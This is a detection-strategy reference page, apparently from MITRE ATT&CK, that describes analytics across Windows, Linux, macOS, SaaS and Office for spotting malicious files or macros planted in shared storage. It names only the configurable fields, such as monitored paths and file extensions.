DET0471 Detection of Tainted Content Written to Shared Storage
| Item |
Value |
| ID |
DET0471 |
| Version |
1.0 |
| Created |
21 October 2025 |
| Last Modified |
21 October 2025 |
Technique Detected: T1080 (Taint Shared Content)
Analytics
Windows
AN1298
Detects adversary tampering of shared directories via file drops (e.g., malicious LNK, EXE, VBS) followed by user execution or suspicious network activity.
Log Sources
Mutable Elements
| Field |
Description |
| SharedPathPrefix |
Defines monitored shared directories (e.g., \server\HR). |
| ExecutableExtensions |
Monitored file types dropped in shared paths (e.g., .lnk, .exe, .vbs). |
Linux
AN1299
Detects script or binary modification within shared NFS/SMB directories followed by process execution from those paths.
Log Sources
Mutable Elements
| Field |
Description |
| MountPath |
Mount path of monitored shared volumes (e.g., /mnt/shared). |
| FilenamePattern |
Pattern matching of abnormal or disguised filenames. |
macOS
AN1300
Detects modification of shared network folders via .app bundles or scripting files with hidden extensions (e.g., double extensions like docx.app).
Log Sources
Mutable Elements
| Field |
Description |
| FileExtensionDeception |
Monitors use of hidden extensions or double extensions. |
| TargetSharedFolder |
Defines sensitive shared folders (e.g., /Users/Shared/HR). |
SaaS
AN1301
Detects upload of malicious or unusual file types into cloud-shared folders, followed by user downloads or interactions.
Log Sources
Mutable Elements
| Field |
Description |
| UserUploadRateThreshold |
Abnormal upload patterns into shared drives. |
| MaliciousFileIndicator |
File hash or known-bad filename pattern matching. |
Office Suite
AN1302
Detects embedded macros or scripts added to shared documents or use of external references to execute code.
Log Sources
Mutable Elements
| Field |
Description |
| MacroExecutionPolicy |
Controls macro execution based on user or group policy. |
| SuspiciousKeywordMatch |
Regex match on suspicious VBA function names or calls. |